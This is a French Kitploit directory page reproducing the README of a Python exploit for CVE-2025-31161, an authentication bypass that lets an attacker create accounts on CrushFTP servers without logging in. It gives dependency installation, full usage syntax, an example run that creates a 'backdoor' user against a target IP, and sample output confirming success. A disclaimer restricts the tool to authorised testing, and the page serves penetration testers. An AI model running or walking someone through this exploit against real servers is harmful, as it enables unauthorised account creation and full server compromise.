Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-31161 — 🛡️ CVE-2025-31161 - Exploit de contournement d'authentification de création d'utilisateurs CrushFTP | Kitploit
Outils/GitHubGitHub/0xgh057r3c0n/cve-2025-31161
Authentification et AutorisationAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHub0xgh057r3c0n/cve-2025-31161

CVE-2025-31161

🛡️ CVE-2025-31161 - Exploit de contournement d'authentification de création d'utilisateurs CrushFTP

Voir le dépôt
5il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-31161 - Exploit de contournement d'authentification pour la création d'utilisateur CrushFTP

CrushFTP Logo

📌 Description

Cet exploit Python cible les serveurs CrushFTP vulnérables à la CVE-2025-31161. La vulnérabilité permet la création de comptes utilisateur sans authentification en envoyant une charge utile XML spécialement conçue à l'interface Web, ce qui peut entraîner un compromis total du serveur.


⚠️ Avertissement

Cet outil est destiné uniquement à des tests de sécurité éducatifs et autorisés.
L'utilisation non autorisée contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite est illégale et contraire à l'éthique.


🧰 Prérequis

  • Python 3
  • pip3
  • Modules Python :
    • requests
    • colorama

✅ Installer Python3 et pip3

Debian/Ubuntu :

root@kitploit:~
sudo apt update
sudo apt install python3 python3-pip -y

CentOS/RHEL :

root@kitploit:~
sudo yum install python3 python3-pip -y

macOS (avec Homebrew) :

root@kitploit:~
brew install python3

✅ Installer les dépendances Python

root@kitploit:~
pip3 install requests colorama

🔧 Utilisation

root@kitploit:~
python3 CVE-2025-31161.py --target_host <TARGET_IP> [--port <PORT>] [--target_user <ADMIN>] [--new_user <USERNAME>] [--password <PASSWORD>]

🔍 Exemple

root@kitploit:~
python3 CVE-2025-31161.py --target_host 192.168.1.100 --new_user backdoor --password P@ssw0rd!

🧪 Options de la ligne de commande


🖥️ Exemple de sortie

root@kitploit:~
[+] Preparing Payloads
  [-] Warming up the target...
  [-] Target is up and running
[+] Sending Account Create Request
  [!] User created successfully!

[+] Exploit Complete! You can now login with:
   [*] Username: AuthBypassAccount
   [*] Password: CorrectHorseBatteryStaple

👨‍💻 Auteur

Gaurav Bhattacharjee (G4UR4V007)


📄 Licence

Ce projet est sous licence MIT.

Télécharger l’outil
ArgumentDescriptionValeur par défaut
--target_host(Obligatoire) IP ou domaine de la cible—
--portPort de l'interface Web CrushFTP8080
--target_userNom d'utilisateur admin (utilisé dans la charge utile)crushadmin
--new_userNom d'utilisateur pour le nouveau compte non autoriséAuthBypassAccount
--passwordMot de passe pour le nouvel utilisateurCorrectHorseBatteryStaple